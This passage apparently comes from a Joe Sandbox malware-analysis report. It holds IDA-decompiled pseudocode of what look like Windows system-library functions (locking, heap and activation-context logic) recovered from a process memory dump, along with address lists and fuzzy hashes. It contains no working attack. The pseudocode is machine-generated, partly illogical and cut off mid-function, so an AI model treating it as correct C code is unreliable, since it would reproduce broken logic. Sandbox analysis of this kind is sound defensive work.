								return E0380B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x037e4128
0x037e4135
0x037e413c
0x037e4141
0x037e4145
0x037e4147
0x037e414e
0x037e4151
0x037e4159
0x037e415c
0x037e4160
0x037e4164
0x037e4168
0x037e416c
0x037e417f
0x037e4181
0x037e446a
0x037e446a
0x037e418c
0x037e4195
0x037e4199
0x037e4432
0x037e4439
0x037e443d
0x037e4442
0x037e4447
0x00000000
0x037e419f
0x037e41a3
0x037e41b1
0x037e41b9
0x037e41bd
0x037e45db
0x037e45db
0x00000000
0x037e41c3
0x037e41c3
0x037e41ce
0x037e41d4
0x0382e138
0x0382e13e
0x0382e169
0x0382e16d
0x0382e19e
0x0382e16f
0x0382e16f
0x0382e175
0x0382e179
0x0382e18f
0x0382e193
0x00000000
0x0382e199
0x00000000
0x0382e199
0x0382e193
0x00000000
0x00000000
0x00000000
0x037e41da
0x037e41da
0x037e41df
0x037e41e4
0x037e41ec
0x037e4203
0x037e4207
0x0382e1fd
0x037e4222
0x037e4226
0x0382e1f3
0x0382e1f3
0x037e422c
0x037e422c
0x037e4233
0x0382e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x037e4239
0x037e4239
0x037e4239
0x037e4239
0x037e4233
0x037e4226
0x037e41ee
0x037e41ee
0x037e41f4
0x037e4575
0x0382e1b1
0x0382e1b1
0x00000000
0x037e457b
0x037e457b
0x037e4582
0x0382e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x037e4588
0x037e4588
0x037e458c
0x0382e1c4
0x0382e1c4
0x00000000
0x037e4592
0x037e4592
0x037e4599
0x0382e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x037e459f
0x037e459f
0x037e45a3
0x0382e1d7
0x0382e1e4
0x00000000
0x037e45a9
0x037e45a9
0x037e45b0
0x0382e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x037e45b6
0x037e45b6
0x037e45b6
0x00000000
0x037e45b6
0x037e45b0
0x037e45a3
0x037e4599
0x037e458c
0x037e4582
0x00000000
0x00000000
0x00000000
0x00000000
0x037e41f4
0x037e423e
0x037e4241
0x037e45c0
0x037e45c4
0x00000000
0x037e45ca
0x037e45ca
0x00000000
0x0382e207
0x0382e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x037e45d1
0x00000000
0x00000000
0x037e45ca
0x00000000
0x037e4247
0x037e4247
0x037e4247
0x037e4249
0x037e4249
0x037e4249
0x037e4251
0x037e4251
0x037e4257
0x037e425f
0x037e426e
0x037e4270
0x037e427a
0x0382e219
0x0382e219
0x037e4280
0x037e4282
0x037e4456
0x037e45ea
0x00000000
0x037e45f0
0x0382e223
0x00000000
0x0382e223
0x037e445c
0x037e445c
0x00000000
0x037e445c
0x00000000
0x037e4288
0x037e428c
0x0382e298
0x037e4292
0x037e4292
0x037e429e
0x037e42a3
0x037e42a7
0x037e42ac
0x0382e22d
0x037e42b2
0x037e42b2
0x037e42b9
0x037e42bc
0x037e42c2
0x037e42ca
0x037e42cd
0x037e42cd
0x037e42d4
0x037e433f
0x037e433f
0x037e42d6
0x037e42d6
0x037e42d9
0x037e42dd
0x037e42eb
0x0382e23a
0x037e42f1
0x037e4305
0x037e430d
0x037e4315
0x037e4318
0x037e431f
0x037e4322
0x037e432e
0x037e433b
0x037e433b
0x00000000
0x037e432e
0x037e42eb
0x037e434c
0x037e434e
0x037e4352
0x037e4359
0x037e435e
0x037e4361
0x037e436e
0x037e438a
0x037e438e
0x037e4396
0x037e439e
0x037e43a1
0x037e43ad
0x037e43bb
0x037e43bb
0x037e43ad
0x037e436e
0x037e43bf
0x037e43c5
0x037e4463
0x037e4463
0x037e43ce
0x037e43d5
0x037e43d9
0x037e43df
0x037e4475
0x037e4479
0x037e4491
0x037e4491
0x037e4479
0x037e43e5
0x037e43eb
0x037e43f4
0x037e43f6
0x037e43f9
0x037e43fc
0x037e43ff
0x037e44e8
0x037e44ed
0x037e44f3
0x0382e247
0x00000000
0x037e44f9
0x037e4504
0x037e4508
0x037e450f
0x0382e269
0x00000000
0x037e4515
0x037e4519
0x037e4531
0x037e4534
0x037e4537
0x037e453e
0x037e4541
0x037e454a
0x0382e255
0x0382e255
0x0382e25b
0x0382e25e
0x0382e261
0x0382e261
0x037e4555
0x037e4559
0x037e455d
0x0382e26d
0x0382e270
0x0382e274
0x0382e27a
0x0382e27d
0x0382e28e
0x0382e28e
0x037e4563
0x037e4563
0x037e4569
0x037e4569
0x00000000
0x037e455d
0x037e450f
0x00000000
0x037e44f3
0x037e43ff
0x037e4405
0x037e4405
0x037e4405
0x037e42ac
0x037e428c
0x037e4282
0x037e4407
0x037e440d
0x0382e2af
0x0382e2af
0x037e4413
0x037e4413
0x00000000
0x037e41d4
0x00000000
0x037e41c3
0x037e41bd
0x037e4415
0x037e4415
0x037e4416
0x037e4417
0x037e4429
0x037e416e
0x037e416e
0x037e4175
0x037e4498
0x037e449f
0x0382e12d
0x00000000
0x0382e133
0x00000000
0x0382e133
0x037e44a5
0x037e44a5
0x037e44aa
0x00000000
0x037e44bb
0x037e44ca
0x037e44d6
0x037e44d7
0x037e44d8
0x037e44e3
0x037e44e3
0x037e44aa
0x037e417b
0x037e417b
0x037e417b
0x00000000
0x037e417b
0x037e4175
0x00000000

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b86f4f31919732ec3521ff27173b45f955e1791ae3042b288c0ff37b26b3f65b
Instruction ID: 51d7ef7284ddb70d9892a0d4c5f661bb3260fba530f9565c9b647cd5afe46cd7
Opcode Fuzzy Hash: b86f4f31919732ec3521ff27173b45f955e1791ae3042b288c0ff37b26b3f65b
Instruction Fuzzy Hash: 14F19C756083118BC724CF6AC484A3AF7E5FF89714F08896EF896CB290E734D881CB56

Uniqueness

Uniqueness Score: -1.00%

Function 037F20A0 Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E037F20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x38b8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E037F2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E037F2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E037C58EC(_t240);
									_t221 =  *0x38b5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x38b5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E03804A2C(0x38b6e40, 0x3804b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E037E7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x37a5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E037FF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E037FF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E03847016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L037E2400(_t267 + 0x20);
															}
															L037E2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E037F2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E037E2280(_t134, 0x38b8608);
									__eflags =  *0x38b6e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E037DFFB0(_t198, _t241, 0x38b8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x38b6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x38b8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E037F6B90(_t210,  &_v64);
										_t262 =  *0x38b8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E037FE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E038097C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0380006A(0x38b8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x38b8608);
												E0380B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x38b6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x38b6e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E037DFFB0(_t198, _t240, 0x38b8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E038000C2(0x38b8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x037f20a0
0x037f20a8
0x037f20ad
0x037f20b3
0x037f20b8
0x037f20c2
0x037f20c7
0x037f20cb
0x037f20d2
0x037f2263
0x037f2266
0x03835836
0x03835836
0x00000000
0x037f226c
0x037f226c
0x037f2270
0x037f2274
0x037f20e2
0x037f20e2
0x037f20e6
0x037f20ee
0x038357dc
0x038357de
0x038357ec
0x038357ec
0x038357f1
0x038357f3
0x038357f8
0x00000000
0x038357f8
0x038357e0
0x038357e4
0x038357ea
0x00000000
0x00000000
0x00000000
0x038357ea
0x037f20f4
0x037f20f4
0x037f20f8
0x037f20f8
0x037f20fc
0x037f2100
0x037f2106
0x037f2201
0x037f2206
0x037f220b
0x037f220e
0x037f22a9
0x037f22ac
0x00000000
0x00000000
0x037f22b2
0x037f22b5
0x03835801
0x03835806
0x00000000
0x00000000
0x03835810
0x03835815
0x03835818
0x00000000
0x00000000
0x0383581e
0x037f22bb
0x037f22bb
0x037f2218
0x037f2218
0x037f221c
0x037f2220
0x037f2222
0x037f22c2
0x037f22c4
0x037f22dc
0x037f22dc
0x037f22e1
0x00000000
0x00000000
0x00000000
0x037f22e7
0x037f22c8
0x037f22cd
0x037f22d3
0x037f22d6
0x03835823
0x03835825
0x03835827
0x00000000
0x00000000
0x0383582d
0x00000000
0x0383582d
0x00000000
0x037f2228
0x037f2228
0x00000000
0x037f2228
0x037f2222
0x037f2214
0x037f2214
0x00000000
0x037f2114
0x037f2114
0x037f2114
0x037f211a
0x037f211c
0x037f2348
0x037f234d
0x03835840
0x03835845
0x03835848
0x0383584e
0x0383584e
0x03835848
0x037f2353
0x037f2355
0x037f2388
0x037f2388
0x037f2368
0x037f236a
0x037f236c
0x037f238f
0x00000000
0x037f236e
0x037f236e
0x037f218e
0x037f218e
0x037f2191
0x037f2195
0x03835a03
0x03835a06
0x03835a0c
0x03835a0f
0x03835a11
0x03835a13
0x03835a13
0x03835a19
0x03835a1f
0x00000000
0x037f219b
0x037f219b
0x037f21a0
0x037f2282
0x037f2284
0x037f2284
0x037f2284
0x037f2284
0x037f21a6
0x037f21a9
0x037f21ac
0x037f21ae
0x037f21b3
0x037f228b
0x037f2290
0x037f2379
0x037f2296
0x037f2298
0x037f2298
0x037f2290
0x037f21b9
0x037f21be
0x037f22a2
0x037f22a2
0x037f21c4
0x037f21c8
0x037f21cc
0x037f21d0
0x037f21d4
0x037f21de
0x037f21e3
0x03835a29
0x03835a2c
0x00000000
0x00000000
0x03835a3b
0x00000000
0x037f21e9
0x037f21e9
0x037f21e9
0x037f21ee
0x037f21f1
0x03835a45
0x03835a4b
0x03835a52
0x03835a58
0x03835a5d
0x03835a5f
0x03835a71
0x03835a61
0x03835a6a
0x03835a6a
0x03835a76
0x03835a79
0x03835a7f
0x03835a83
0x03835a85
0x03835a87
0x03835a87
0x03835a8c
0x03835a91
0x03835a97
0x03835a9f
0x03835aa0
0x03835aa1
0x03835aa6
0x03835aab
0x03835ab1
0x03835ab3
0x03835ab9
0x03835aca
0x03835ad4
0x03835ad4
0x03835ade
0x03835ade
0x03835aab
0x03835a79
0x03835a52
0x037f21f7
0x037f21f9
0x037f21fe
0x037f21fe
0x037f21e3
0x037f2195
0x037f236c
0x037f2122
0x037f2122
0x037f2124
0x037f2231
0x037f2236
0x037f2236
0x037f2238
0x037f2238
0x037f2240
0x037f2242
0x037f2244
0x038359fc
0x037f218c
0x037f218c
0x00000000
0x037f218c
0x037f224a
0x037f224f
0x037f2256
0x037f2304
0x037f2309
0x037f230f
0x037f231e
0x037f231e
0x037f231e
0x037f2320
0x037f2325
0x037f232a
0x037f232c
0x037f233e
0x037f233e
0x00000000
0x037f232c
0x037f2311
0x037f2317
0x037f231a
0x037f231c
0x037f2380
0x037f2380
0x037f2380
0x037f2384
0x00000000
0x00000000
0x037f2386
0x00000000
0x037f231c
0x037f225c
0x037f225c
0x00000000
0x037f225c
0x037f212a
0x037f2134
0x037f2138
0x037f213d
0x03835858
0x03835863
0x03835863
0x03835867
0x0383586a
0x00000000
0x00000000
0x0383586c
0x0383586c
0x03835871
0x03835875
0x03835877
0x03835997
0x0383599c
0x038359a1
0x038359a7
0x038359a7
0x00000000
0x038359a7
0x0383587d
0x00000000
0x0383588b
0x0383588b
0x03835890
0x03835892
0x03835894
0x03835899
0x0383589b
0x038358a0
0x038358a0
0x038358aa
0x038358b2
0x038358b6
0x038358be
0x038358c6
0x038358c9
0x0383590d
0x03835917
0x0383591a
0x0383591c
0x03835920
0x03835928
0x0383592a
0x0383592c
0x0383592e
0x0383592e
0x038358cb
0x038358cd
0x038358d8
0x038358e0
0x038358f4
0x038358fe
0x038358fe
0x0383593a
0x0383593e
0x03835940
0x03835942
0x00000000
0x03835944
0x03835944
0x03835949
0x0383594e
0x0383594e
0x03835953
0x0383595b
0x03835976
0x03835976
0x0383597a
0x0383597f
0x00000000
0x00000000
0x00000000
0x00000000
0x03835981
0x03835981
0x03835981
0x03835983
0x03835988
0x0383598d
0x03835991
0x03835991
0x00000000
0x0383595d
0x0383595d
0x03835963
0x03835965
0x00000000
0x00000000
0x00000000
0x00000000
0x03835967
0x03835967
0x0383596b
0x0383596d
0x00000000
0x00000000
0x0383596f
0x03835971
0x03835971
0x03835974
0x00000000
0x00000000
0x00000000
0x03835974
0x00000000
0x03835967
0x0383595b
0x03835942
0x03835863
0x037f2143
0x037f2143
0x037f2149
0x037f214f
0x037f22f1
0x037f22f6
0x00000000
0x037f2173
0x037f2173
0x037f217d
0x037f2181
0x037f2186
0x038359ae
0x038359b2
0x038359b5
0x038359b7
0x038359ba
0x038359cd
0x038359d1
0x038359d5
0x038359d9
0x038359db
0x00000000
0x00000000
0x038359dd
0x038359dd
0x038359e1
0x038359e4
0x038359e7
0x038359ee
0x038359ee
0x038359f3
0x038359f3
0x00000000
0x037f2186
0x037f214f
0x037f2106
0x037f2266
0x037f20d8
0x037f20da
0x037f20e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecb6697e542191d6f2017c925eca07708c595629c4ad13d259b586ba1643e3
Instruction ID: 300cb7a510998fe15bef3a5015267f3625b0f69deec11c7843c3cf8adfbb183c
Opcode Fuzzy Hash: fbecb6697e542191d6f2017c925eca07708c595629c4ad13d259b586ba1643e3
Instruction Fuzzy Hash: 44F147396083459FDB25DF68C84076BB7E5BF86324F08899DEA95CB391D734D840CB82

Uniqueness

Uniqueness Score: -1.00%

Function 037DD5E0 Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E037DD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				intOrPtr _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				intOrPtr _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x38bd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E037D6600(0x38b52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x38b7b9c; // 0x0
							_t281 = L037E4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0380F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x38b7b90; // 0x77cd0000
								if(_t384 == 0) {
									_t353 =  *0x38b7b8c; // 0x31d3db8
									_v176 = _t353;
									_t63 = _t353 + 0x50; // 0x31d3e68
									_t64 =  *_t63 + 0x20; // 0x9
									_t320 =  *_t64;
									_v184 = _t320;
								} else {
									E037E2280(_t200, 0x38b84d8);
									_t277 =  *0x38b85f4; // 0x31d1fe0
									_t351 =  *0x38b85f8 & 1;
									while(_t277 != 0) {
										_t21 = _t277 - 0x50; // 0x77280000
										_t337 =  *_t21;
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
